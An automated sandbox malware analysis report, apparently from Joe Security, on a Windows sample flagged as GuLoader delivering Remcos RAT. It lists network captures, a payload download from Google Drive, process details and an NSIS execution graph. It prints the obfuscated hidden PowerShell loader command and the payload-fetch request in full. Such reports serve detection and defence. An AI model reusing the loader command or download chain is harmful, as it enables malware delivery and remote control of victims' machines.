                                                                              Jan 10, 2025 23:53:27.302124023 CET564971487.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:27.307630062 CET4971456192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:27.307804108 CET4971456192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:27.312583923 CET564971487.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:28.919332981 CET564971487.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:28.921557903 CET4971456192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:28.921595097 CET4971456192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:28.926913977 CET564971487.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:29.094201088 CET4971556192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:29.099025011 CET564971587.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:29.101627111 CET4971556192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:29.102021933 CET4971556192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:29.106761932 CET564971587.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:30.697897911 CET564971587.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:30.697957039 CET4971556192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:30.697982073 CET4971556192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:30.703990936 CET564971587.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:30.875335932 CET4971656192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:30.880856991 CET564971687.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:30.883569002 CET4971656192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:30.883954048 CET4971656192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:30.888704062 CET564971687.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:32.533911943 CET564971687.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:32.534008980 CET4971656192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:32.534051895 CET4971656192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:32.538842916 CET564971687.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:32.703669071 CET4971756192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:32.708528042 CET564971787.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:32.708663940 CET4971756192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:32.708950996 CET4971756192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:32.713723898 CET564971787.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:34.359749079 CET564971787.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:34.359812021 CET4971756192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:34.359847069 CET4971756192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:34.364651918 CET564971787.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:34.531616926 CET4971856192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:34.537404060 CET564971887.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:34.537631989 CET4971856192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:34.537849903 CET4971856192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:34.542619944 CET564971887.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:36.153100967 CET564971887.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:36.153697968 CET4971856192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:36.153697968 CET4971856192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:36.158524036 CET564971887.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:36.312858105 CET4971956192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:36.317739010 CET564971987.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:36.317822933 CET4971956192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:36.318058968 CET4971956192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:36.322804928 CET564971987.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:37.935077906 CET564971987.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:37.935324907 CET4971956192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:37.935410023 CET4971956192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:37.940203905 CET564971987.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:38.094265938 CET4972056192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:38.099184036 CET564972087.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:38.099270105 CET4972056192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:38.099500895 CET4972056192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:38.104248047 CET564972087.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:39.732326031 CET564972087.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:39.732404947 CET4972056192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:39.732450008 CET4972056192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:39.737417936 CET564972087.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:39.875421047 CET4972156192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:39.880265951 CET564972187.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:39.881705999 CET4972156192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:39.881943941 CET4972156192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:39.887181044 CET564972187.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:41.518073082 CET564972187.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:41.518138885 CET4972156192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:41.518235922 CET4972156192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:41.524339914 CET564972187.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:41.656924009 CET4972256192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:41.661844969 CET564972287.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:41.661923885 CET4972256192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:41.662152052 CET4972256192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:41.666949987 CET564972287.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:43.281627893 CET564972287.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:43.281749964 CET4972256192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:43.305027962 CET4972256192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:43.309879065 CET564972287.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:43.438154936 CET4972356192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:43.442969084 CET564972387.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:43.443042994 CET4972356192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:43.443308115 CET4972356192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:43.448067904 CET564972387.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:45.078288078 CET564972387.120.116.187192.168.2.5
                                                                              Jan 10, 2025 23:53:45.079603910 CET4972356192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:46.459602118 CET4972356192.168.2.587.120.116.187
                                                                              Jan 10, 2025 23:53:46.464476109 CET564972387.120.116.187192.168.2.5
                                                                              Timestamp                            Source Port  Dest Port  Source IP    Dest IP
                                                                              Jan 10, 2025 23:49:58.116555929 CET  53           49660      1.1.1.1      192.168.2.5
                                                                              Jan 10, 2025 23:50:05.318648100 CET  51209        53         192.168.2.5  1.1.1.1
                                                                              Jan 10, 2025 23:50:05.325617075 CET  53           51209      1.1.1.1      192.168.2.5
                                                                              Jan 10, 2025 23:50:06.438323975 CET  58613        53         192.168.2.5  1.1.1.1
                                                                              Jan 10, 2025 23:50:06.445194960 CET  53           58613      1.1.1.1      192.168.2.5
                                                                              Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                          Type            Class        DNS over HTTPS
                                                                              Jan 10, 2025 23:50:05.318648100 CET  192.168.2.5  1.1.1.1  0xe044    Standard query (0)  drive.google.com              A (IP address)  IN (0x0001)  false
                                                                              Jan 10, 2025 23:50:06.438323975 CET  192.168.2.5  1.1.1.1  0x44a9    Standard query (0)  drive.usercontent.google.com  A (IP address)  IN (0x0001)  false
                                                                              Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                          CName  Address         Type            Class        DNS over HTTPS
                                                                              Jan 10, 2025 23:50:05.325617075 CET  1.1.1.1    192.168.2.5  0xe044    No error (0)  drive.google.com                     142.250.185.78  A (IP address)  IN (0x0001)  false
                                                                              Jan 10, 2025 23:50:06.445194960 CET  1.1.1.1    192.168.2.5  0x44a9    No error (0)  drive.usercontent.google.com         172.217.16.129  A (IP address)  IN (0x0001)  false
                                                                              • drive.google.com
                                                                              • drive.usercontent.google.com
                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                              0           192.168.2.5  49396        142.250.185.78  443               7060  C:\Windows\SysWOW64\msiexec.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 22:50:06 UTC216OUTGET /uc?export=download&id=1Y8wNX0Y_p72krbO6gQOeTxW-JyyjkgkX HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                              Host: drive.google.com
                                                                              Cache-Control: no-cache
                                                                              2025-01-10 22:50:06 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                              Content-Type: application/binary
                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                              Pragma: no-cache
                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                              Date: Fri, 10 Jan 2025 22:50:06 GMT
                                                                              Location: https://drive.usercontent.google.com/download?id=1Y8wNX0Y_p72krbO6gQOeTxW-JyyjkgkX&export=download
                                                                              Strict-Transport-Security: max-age=31536000
                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                              Content-Security-Policy: script-src 'nonce-R8Ab9EA3Q3NIIi87_bR3iw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                              Server: ESF
                                                                              Content-Length: 0
                                                                              X-XSS-Protection: 0
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              X-Content-Type-Options: nosniff
                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                              Connection: close


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              1 | 192.168.2.5 | 49406 | 172.217.16.129 | 443 | 7060 | C:\Windows\SysWOW64\msiexec.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2025-01-10 22:50:07 UTC | 258 | OUT | GET /download?id=1Y8wNX0Y_p72krbO6gQOeTxW-JyyjkgkX&export=download HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                              Cache-Control: no-cache
                                                                              Host: drive.usercontent.google.com
                                                                              Connection: Keep-Alive
                                                                              2025-01-10 22:50:09 UTC | 4952 | IN | HTTP/1.1 200 OK
                                                                              X-GUploader-UploadID: AFiumC53g___cX8jRoXdcx2-6LSCv7qq6PCPqKQCNPiK7YALz_qSqUrNf-uu8vLFKm01Om6zeMEUlXA
                                                                              Content-Type: application/octet-stream
                                                                              Content-Security-Policy: sandbox
                                                                              Content-Security-Policy: default-src 'none'
                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                              X-Content-Security-Policy: sandbox
                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                              Cross-Origin-Embedder-Policy: require-corp
                                                                              Cross-Origin-Resource-Policy: same-site
                                                                              X-Content-Type-Options: nosniff
                                                                              Content-Disposition: attachment; filename="pCjegmTaGhnStrJWAjBpQ176.bin"
                                                                              Access-Control-Allow-Origin: *
                                                                              Access-Control-Allow-Credentials: false
                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                              Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                              Accept-Ranges: bytes
                                                                              Content-Length: 492608
                                                                              Last-Modified: Mon, 09 Dec 2024 12:22:02 GMT
                                                                              Date: Fri, 10 Jan 2025 22:50:09 GMT
                                                                              Expires: Fri, 10 Jan 2025 22:50:09 GMT
                                                                              Cache-Control: private, max-age=0
                                                                              X-Goog-Hash: crc32c=pvtmwg==
                                                                              Server: UploadServer
                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                              Connection: close


                                                                              Target ID:0
                                                                              Start time:17:49:38
                                                                              Start date:10/01/2025
                                                                              Path:C:\Users\user\Desktop\WtZl31OLfA.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\WtZl31OLfA.exe"
                                                                              Imagebase:0x400000
                                                                              File size:777'513 bytes
                                                                              MD5 hash:74C8F736D425B1BD2027C2B5B144E188
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:1
                                                                              Start time:17:49:38
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:powershell.exe -windowstyle hidden "$Ekstremumspunktet32=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Arbejdsbesparelsernes40\Kbmand.Too';$byelaws=$Ekstremumspunktet32.SubString(71187,3);.$byelaws($Ekstremumspunktet32) "
                                                                              Imagebase:0xc50000
                                                                              File size:433'152 bytes
                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2297304332.000000000A291000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:2
                                                                              Start time:17:49:38
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff6d64d0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:5
                                                                              Start time:17:50:02
                                                                              Start date:10/01/2025
                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                              Imagebase:0x380000
                                                                              File size:59'904 bytes
                                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.4503566716.0000000005DC5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.4503566716.0000000005D6A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.4503566716.0000000005DAC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.4503566716.0000000005DD9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:false

                                                                                Execution Graph

                                                                                Execution Coverage:23.9%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:21.2%
                                                                                Total number of Nodes:1310
                                                                                Total number of Limit Nodes:39
40185c 3372->3387 3389 405c25 GetFileAttributesW CreateFileW 3372->3389 3374 4018a2 3373->3374 3375 4018b6 SetFileTime 3374->3375 3376 4018c8 CloseHandle 3374->3376 3375->3376 3376->3371 3378 4018d9 3376->3378 3377->3372 3379 4018f1 3378->3379 3380 4018de 3378->3380 3383 406072 18 API calls 3379->3383 3382 406072 18 API calls 3380->3382 3381->3372 3384 4018e6 lstrcatW 3382->3384 3385 4018f9 3383->3385 3384->3385 3388 405795 MessageBoxIndirectW 3385->3388 3386->3372 3387->3369 3387->3371 3388->3371 3389->3372 3390->3358 3391->3359 3807 404568 3808 404578 3807->3808 3809 40459e 3807->3809 3811 404114 19 API calls 3808->3811 3810 40417b 8 API calls 3809->3810 3812 4045aa 3810->3812 3813 404585 SetDlgItemTextW 3811->3813 3813->3809 3814 401ee9 3815 402bbf 18 API calls 3814->3815 3816 401ef0 3815->3816 3817 406393 2 API calls 3816->3817 3818 401ef6 3817->3818 3820 401f07 3818->3820 3821 405f97 wsprintfW 3818->3821 3821->3820 3822 4021ea 3823 402bbf 18 API calls 3822->3823 3824 4021f0 3823->3824 3825 402bbf 18 API calls 3824->3825 3826 4021f9 3825->3826 3827 402bbf 18 API calls 3826->3827 3828 402202 3827->3828 3829 406393 2 API calls 3828->3829 3830 40220b 3829->3830 3831 40221c lstrlenW lstrlenW 3830->3831 3832 40220f 3830->3832 3834 4051af 25 API calls 3831->3834 3833 4051af 25 API calls 3832->3833 3835 402217 3832->3835 3833->3835 3836 40225a SHFileOperationW 3834->3836 3836->3832 3836->3835 3837 40156b 3838 401584 3837->3838 3839 40157b ShowWindow 3837->3839 3840 401592 ShowWindow 3838->3840 3841 402a4c 3838->3841 3839->3838 3840->3841 3392 4052ee 3393 405498 3392->3393 3394 40530f GetDlgItem GetDlgItem GetDlgItem 3392->3394 3396 4054a1 GetDlgItem CreateThread CloseHandle 3393->3396 3397 4054c9 3393->3397 3437 404149 SendMessageW 3394->3437 3396->3397 3460 405282 5 API calls 3396->3460 3399 4054e0 ShowWindow ShowWindow 3397->3399 3400 405519 3397->3400 3401 4054f4 3397->3401 3398 40537f 3403 405386 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3398->3403 
3442 404149 SendMessageW 3399->3442 3446 40417b 3400->3446 3402 405554 3401->3402 3405 405508 3401->3405 3406 40552e ShowWindow 3401->3406 3402->3400 3412 405562 SendMessageW 3402->3412 3410 4053f4 3403->3410 3411 4053d8 SendMessageW SendMessageW 3403->3411 3443 4040ed 3405->3443 3408 405540 3406->3408 3409 40554e 3406->3409 3415 4051af 25 API calls 3408->3415 3416 4040ed SendMessageW 3409->3416 3417 405407 3410->3417 3418 4053f9 SendMessageW 3410->3418 3411->3410 3414 405527 3412->3414 3419 40557b CreatePopupMenu 3412->3419 3415->3409 3416->3402 3438 404114 3417->3438 3418->3417 3420 406072 18 API calls 3419->3420 3422 40558b AppendMenuW 3420->3422 3424 4055a8 GetWindowRect 3422->3424 3425 4055bb TrackPopupMenu 3422->3425 3423 405417 3426 405420 ShowWindow 3423->3426 3427 405454 GetDlgItem SendMessageW 3423->3427 3424->3425 3425->3414 3429 4055d6 3425->3429 3430 405436 ShowWindow 3426->3430 3432 405443 3426->3432 3427->3414 3428 40547b SendMessageW SendMessageW 3427->3428 3428->3414 3431 4055f2 SendMessageW 3429->3431 3430->3432 3431->3431 3433 40560f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3431->3433 3441 404149 SendMessageW 3432->3441 3435 405634 SendMessageW 3433->3435 3435->3435 3436 40565d GlobalUnlock SetClipboardData CloseClipboard 3435->3436 3436->3414 3437->3398 3439 406072 18 API calls 3438->3439 3440 40411f SetDlgItemTextW 3439->3440 3440->3423 3441->3427 3442->3401 3444 4040f4 3443->3444 3445 4040fa SendMessageW 3443->3445 3444->3445 3445->3400 3447 404193 GetWindowLongW 3446->3447 3457 40421c 3446->3457 3448 4041a4 3447->3448 3447->3457 3449 4041b3 GetSysColor 3448->3449 3450 4041b6 3448->3450 3449->3450 3451 4041c6 SetBkMode 3450->3451 3452 4041bc SetTextColor 3450->3452 3453 4041e4 3451->3453 3454 4041de GetSysColor 3451->3454 3452->3451 3455 4041f5 3453->3455 3456 4041eb SetBkColor 3453->3456 3454->3453 3455->3457 3458 404208 DeleteObject 3455->3458 3459 40420f CreateBrushIndirect 3455->3459 3456->3455 3457->3414 3458->3459 3459->3457 
3842 40226e 3843 402275 3842->3843 3847 402288 3842->3847 3844 406072 18 API calls 3843->3844 3845 402282 3844->3845 3846 405795 MessageBoxIndirectW 3845->3846 3846->3847 3848 4014f1 SetForegroundWindow 3849 402a4c 3848->3849 3850 401673 3851 402bbf 18 API calls 3850->3851 3852 40167a 3851->3852 3853 402bbf 18 API calls 3852->3853 3854 401683 3853->3854 3855 402bbf 18 API calls 3854->3855 3856 40168c MoveFileW 3855->3856 3857 401698 3856->3857 3858 40169f 3856->3858 3859 401423 25 API calls 3857->3859 3860 406393 2 API calls 3858->3860 3862 4021e1 3858->3862 3859->3862 3861 4016ae 3860->3861 3861->3862 3863 405ef1 38 API calls 3861->3863 3863->3857 3864 401cfa GetDlgItem GetClientRect 3865 402bbf 18 API calls 3864->3865 3866 401d2c LoadImageW SendMessageW 3865->3866 3867 401d4a DeleteObject 3866->3867 3868 402a4c 3866->3868 3867->3868 3493 4027fb 3494 402bbf 18 API calls 3493->3494 3495 402802 FindFirstFileW 3494->3495 3496 402815 3495->3496 3497 40282a 3495->3497 3498 402833 3497->3498 3501 405f97 wsprintfW 3497->3501 3502 406050 lstrcpynW 3498->3502 3501->3498 3502->3496 3869 40237b 3870 402381 3869->3870 3871 402bbf 18 API calls 3870->3871 3872 402393 3871->3872 3873 402bbf 18 API calls 3872->3873 3874 40239d RegCreateKeyExW 3873->3874 3875 4023c7 3874->3875 3876 402a4c 3874->3876 3877 4023e2 3875->3877 3878 402bbf 18 API calls 3875->3878 3879 4023ee 3877->3879 3881 402ba2 18 API calls 3877->3881 3880 4023d8 lstrlenW 3878->3880 3882 402409 RegSetValueExW 3879->3882 3883 403027 32 API calls 3879->3883 3880->3877 3881->3879 3884 40241f RegCloseKey 3882->3884 3883->3882 3884->3876 3886 4014ff 3887 401507 3886->3887 3888 40151a 3886->3888 3889 402ba2 18 API calls 3887->3889 3889->3888 3890 401000 3891 401037 BeginPaint GetClientRect 3890->3891 3893 40100c DefWindowProcW 3890->3893 3894 4010f3 3891->3894 3895 401179 3893->3895 3896 401073 CreateBrushIndirect FillRect DeleteObject 3894->3896 3897 4010fc 3894->3897 3896->3894 3898 401102 CreateFontIndirectW 3897->3898 
3899 401167 EndPaint 3897->3899 3898->3899 3900 401112 6 API calls 3898->3900 3899->3895 3900->3899 3901 401904 3902 40193b 3901->3902 3903 402bbf 18 API calls 3902->3903 3904 401940 3903->3904 3905 405841 69 API calls 3904->3905 3906 401949 3905->3906 3907 402d04 3908 402d16 SetTimer 3907->3908 3909 402d2f 3907->3909 3908->3909 3910 402d84 3909->3910 3911 402d49 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 3909->3911 3911->3910 3912 404905 3913 404931 3912->3913 3914 404915 3912->3914 3916 404964 3913->3916 3917 404937 SHGetPathFromIDListW 3913->3917 3923 405779 GetDlgItemTextW 3914->3923 3919 40494e SendMessageW 3917->3919 3920 404947 3917->3920 3918 404922 SendMessageW 3918->3913 3919->3916 3921 40140b 2 API calls 3920->3921 3921->3919 3923->3918 3924 402786 3925 4029f7 3924->3925 3926 40278d 3924->3926 3927 402ba2 18 API calls 3926->3927 3928 402798 3927->3928 3929 40279f SetFilePointer 3928->3929 3929->3925 3930 4027af 3929->3930 3932 405f97 wsprintfW 3930->3932 3932->3925 3933 401907 3934 402bbf 18 API calls 3933->3934 3935 40190e 3934->3935 3936 405795 MessageBoxIndirectW 3935->3936 3937 401917 3936->3937 3938 401e08 3939 402bbf 18 API calls 3938->3939 3940 401e0e 3939->3940 3941 402bbf 18 API calls 3940->3941 3942 401e17 3941->3942 3943 402bbf 18 API calls 3942->3943 3944 401e20 3943->3944 3945 402bbf 18 API calls 3944->3945 3946 401e29 3945->3946 3947 401423 25 API calls 3946->3947 3948 401e30 ShellExecuteW 3947->3948 3949 401e61 3948->3949 3955 401a15 3956 402bbf 18 API calls 3955->3956 3957 401a1e ExpandEnvironmentStringsW 3956->3957 3958 401a32 3957->3958 3960 401a45 3957->3960 3959 401a37 lstrcmpW 3958->3959 3958->3960 3959->3960 3961 402515 3962 402bbf 18 API calls 3961->3962 3963 40251c 3962->3963 3966 405c25 GetFileAttributesW CreateFileW 3963->3966 3965 402528 3966->3965 3967 402095 3968 402bbf 18 API calls 3967->3968 3969 40209c 3968->3969 3970 402bbf 18 API calls 3969->3970 3971 4020a6 3970->3971 3972 402bbf 18 API calls 3971->3972 3973 4020b0 
3972->3973 3974 402bbf 18 API calls 3973->3974 3975 4020ba 3974->3975 3976 402bbf 18 API calls 3975->3976 3978 4020c4 3976->3978 3977 402103 CoCreateInstance 3982 402122 3977->3982 3978->3977 3979 402bbf 18 API calls 3978->3979 3979->3977 3980 401423 25 API calls 3981 4021e1 3980->3981 3982->3980 3982->3981 3983 401b16 3984 402bbf 18 API calls 3983->3984 3985 401b1d 3984->3985 3986 402ba2 18 API calls 3985->3986 3987 401b26 wsprintfW 3986->3987 3988 402a4c 3987->3988 3503 40159b 3504 402bbf 18 API calls 3503->3504 3505 4015a2 SetFileAttributesW 3504->3505 3506 4015b4 3505->3506 3591 40229d 3592 4022a5 3591->3592 3593 4022ab 3591->3593 3594 402bbf 18 API calls 3592->3594 3595 4022b9 3593->3595 3596 402bbf 18 API calls 3593->3596 3594->3593 3597 402bbf 18 API calls 3595->3597 3599 4022c7 3595->3599 3596->3595 3597->3599 3598 402bbf 18 API calls 3600 4022d0 WritePrivateProfileStringW 3598->3600 3599->3598 3989 401f1d 3990 402bbf 18 API calls 3989->3990 3991 401f24 3990->3991 3992 40642a 5 API calls 3991->3992 3993 401f33 3992->3993 3994 401f4f GlobalAlloc 3993->3994 3997 401fb7 3993->3997 3995 401f63 3994->3995 3994->3997 3996 40642a 5 API calls 3995->3996 3998 401f6a 3996->3998 3999 40642a 5 API calls 3998->3999 4000 401f74 3999->4000 4000->3997 4004 405f97 wsprintfW 4000->4004 4002 401fa9 4005 405f97 wsprintfW 4002->4005 4004->4002 4005->3997 4006 40149e 4007 402288 4006->4007 4008 4014ac PostQuitMessage 4006->4008 4008->4007 4009 40249e 4010 402cc9 19 API calls 4009->4010 4011 4024a8 4010->4011 4012 402ba2 18 API calls 4011->4012 4013 4024b1 4012->4013 4014 4024d5 RegEnumValueW 4013->4014 4015 4024c9 RegEnumKeyW 4013->4015 4016 40281e 4013->4016 4014->4016 4017 4024ee RegCloseKey 4014->4017 4015->4017 4017->4016 3623 40231f 3624 402324 3623->3624 